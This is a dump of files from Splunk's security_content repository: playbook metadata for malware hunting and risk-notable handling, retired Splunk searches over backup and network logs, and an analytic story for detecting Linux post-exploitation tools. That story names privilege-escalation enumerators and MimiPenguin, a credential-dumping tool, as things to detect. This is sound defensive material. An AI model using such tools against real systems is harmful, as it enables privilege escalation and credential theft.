https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/log4j_respond.png
--------------------------------------------------------------------------------
/playbooks/malware_hunt_and_contain.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/malware_hunt_and_contain.png
--------------------------------------------------------------------------------
/playbooks/malware_hunt_and_contain.yml:
--------------------------------------------------------------------------------
1 | name: Malware Hunt and Contain
2 | id: fb3edc76-ff2b-43c0-5f6f-63da4483fd63
3 | version: 1
4 | date: '2021-01-21'
5 | author: Philip Royer, Splunk
6 | type: Response
7 | description: This playbook investigates and remediates malware infections on the endpoint.
8 | playbook: malware_hunt_and_contain
9 | how_to_implement: "Be sure to update asset naming to reflect the asset names configured in your environment."
10 | references: []
11 | app_list:
12 | - "LDAP"
13 | - "ServiceNow"
14 | - "Carbon Black Response"
15 | - "VirusTotal"
16 | tags:
17 | platform_tags: []
18 | playbook_type: Automation
19 | vpe_type: Classic
20 | playbook_fields:
21 | - fileHash
22 | product:
23 | - Splunk SOAR
--------------------------------------------------------------------------------
/playbooks/ransomware_investigate_and_contain.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/ransomware_investigate_and_contain.png
--------------------------------------------------------------------------------
/playbooks/risk_notable_block_indicators.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/risk_notable_block_indicators.png
--------------------------------------------------------------------------------
/playbooks/risk_notable_enrich.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/risk_notable_enrich.png
--------------------------------------------------------------------------------
/playbooks/risk_notable_import_data.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/risk_notable_import_data.png
--------------------------------------------------------------------------------
/playbooks/risk_notable_investigate.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/risk_notable_investigate.png
--------------------------------------------------------------------------------
/playbooks/risk_notable_investigate.yml:
--------------------------------------------------------------------------------
1 | name: Risk Notable Investigate
2 | id: 030edc96-ff2b-48b0-9f6f-03da3783fd63
3 | version: 1
4 | date: "2021-10-22"
5 | author: Kelby Shelton, Splunk
6 | type: Investigation
7 | description: This playbook checks for the presence of the Risk Investigation workbook and updates tasks or leaves generic notes.
8 | playbook: risk_notable_investigate
9 | how_to_implement: For detailed implementation see https://docs.splunk.com/Documentation/ESSOC/latest/user/Useplaybookpack
10 | references:
11 | - https://docs.splunk.com/Documentation/ESSOC/latest/user/Useplaybookpack
12 | app_list: []
13 | tags:
14 | labels:
15 | - risk_notable
16 | playbook_type: Automation
17 | vpe_type: Modern
18 | platform_tags:
19 | - Risk Notable
20 | product:
21 | - Splunk SOAR
22 |
--------------------------------------------------------------------------------
/playbooks/risk_notable_merge_events.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/risk_notable_merge_events.png
--------------------------------------------------------------------------------
/playbooks/risk_notable_mitigate.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/risk_notable_mitigate.png
--------------------------------------------------------------------------------
/playbooks/risk_notable_preprocess.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/risk_notable_preprocess.png
--------------------------------------------------------------------------------
/playbooks/risk_notable_protect_assets_and_users.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/risk_notable_protect_assets_and_users.png
--------------------------------------------------------------------------------
/playbooks/risk_notable_review_indicators.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/risk_notable_review_indicators.png
--------------------------------------------------------------------------------
/playbooks/risk_notable_verdict.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/risk_notable_verdict.png
--------------------------------------------------------------------------------
/playbooks/start_investigation.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/start_investigation.png
--------------------------------------------------------------------------------
/playbooks/threat_intel_investigate.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/threat_intel_investigate.png
--------------------------------------------------------------------------------
/playbooks/trustar_enrich_indicators.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/trustar_enrich_indicators.png
--------------------------------------------------------------------------------
/removed/investigations/all_backup_logs_for_host.yml:
--------------------------------------------------------------------------------
1 | name: All backup logs for host
2 | id: bc91a8cf-aaaa-4bb2-8140-e756cc06fd72
3 | version: 1
4 | date: '2017-09-12'
5 | author: Rico Valdez, Splunk
6 | type: Investigation
7 | status: removed
8 | description: Retrieve the backup logs for the last 2 weeks for a specific host in
9 | order to investigate why backups are not completing successfully.
10 | search: '| search `netbackup` dest=$dest$'
11 | how_to_implement: The successfully implement this search you must first send your
12 | backup logs to Splunk.
13 | known_false_positives: none
14 | references: []
15 | tags:
16 | analytic_story:
17 | - Monitor Backup Solution
18 | product:
19 | - Splunk Phantom
20 | security_domain: endpoint
21 |
--------------------------------------------------------------------------------
/removed/investigations/get_backup_logs_for_endpoint.yml:
--------------------------------------------------------------------------------
1 | name: Get Backup Logs For Endpoint
2 | id: fdcfb369-1725-4c24-824a-22972d7f0d44
3 | version: 1
4 | date: '2017-09-14'
5 | author: David Dorsey, Splunk
6 | type: Investigation
7 | status: removed
8 | description: This search will tell you the backup status from your netbackup_logs
9 | of a specific endpoint for the last week.
10 | search: '`netbackup` COMPUTERNAME=$dest$ | rename COMPUTERNAME as dest, MESSAGE as
11 | signature | table _time, dest, signature'
12 | how_to_implement: You must be ingesting your backup logs.
13 | known_false_positives: ''
14 | references: []
15 | tags:
16 | analytic_story:
17 | - Ransomware
18 | - SamSam Ransomware
19 | product:
20 | - Splunk Phantom
21 | security_domain: endpoint
22 |
--------------------------------------------------------------------------------
/removed/investigations/investigate_network_traffic_from_src_ip.yml:
--------------------------------------------------------------------------------
1 | name: Investigate Network Traffic From src ip
2 | id: 9df9ca9c-a02b-4f48-9eba-0bac55179050
3 | version: 1
4 | date: '2018-06-15'
5 | author: David Dorsey, Splunk
6 | type: Investigation
7 | status: removed
8 | description: This search allows you to find all the network traffic from a specific
9 | IP address.
10 | search: '| from datamodel Network_Traffic.All_Traffic | search src_ip=$src_ip$'
11 | how_to_implement: To successfully implement this search, you must be ingesting your
12 | web-traffic logs and populating the web data model.
13 | known_false_positives: ''
14 | references: []
15 | tags:
16 | analytic_story:
17 | - ColdRoot MacOS RAT
18 | product:
19 | - Splunk Phantom
20 | security_domain: network
21 |
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | contentctl==5.5.3
--------------------------------------------------------------------------------
/stories/deprecated/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/stories/deprecated/.gitkeep
--------------------------------------------------------------------------------
/stories/linux_post_exploitation.yml:
--------------------------------------------------------------------------------
1 | name: Linux Post-Exploitation
2 | id: d310ccfe-5477-11ec-ad05-acde48001122
3 | version: 1
4 | date: '2021-12-03'
5 | author: Rod Soto
6 | status: production
7 | description: This analytic story identifies popular Linux post exploitation tools such as autoSUID, LinEnum, LinPEAS, Linux Exploit Suggesters, MimiPenguin.
8 | narrative: These tools allow operators find possible exploits or paths for privilege escalation based on SUID binaries, user permissions, kernel version and distro version.
9 | references:
10 | - https://attack.mitre.org/matrices/enterprise/linux/
11 | tags:
12 | category:
13 | - Adversary Tactics
14 | product:
15 | - Splunk Enterprise
16 | - Splunk Enterprise Security
17 | - Splunk Cloud
18 | usecase: Security Monitoring
19 |
--------------------------------------------------------------------------------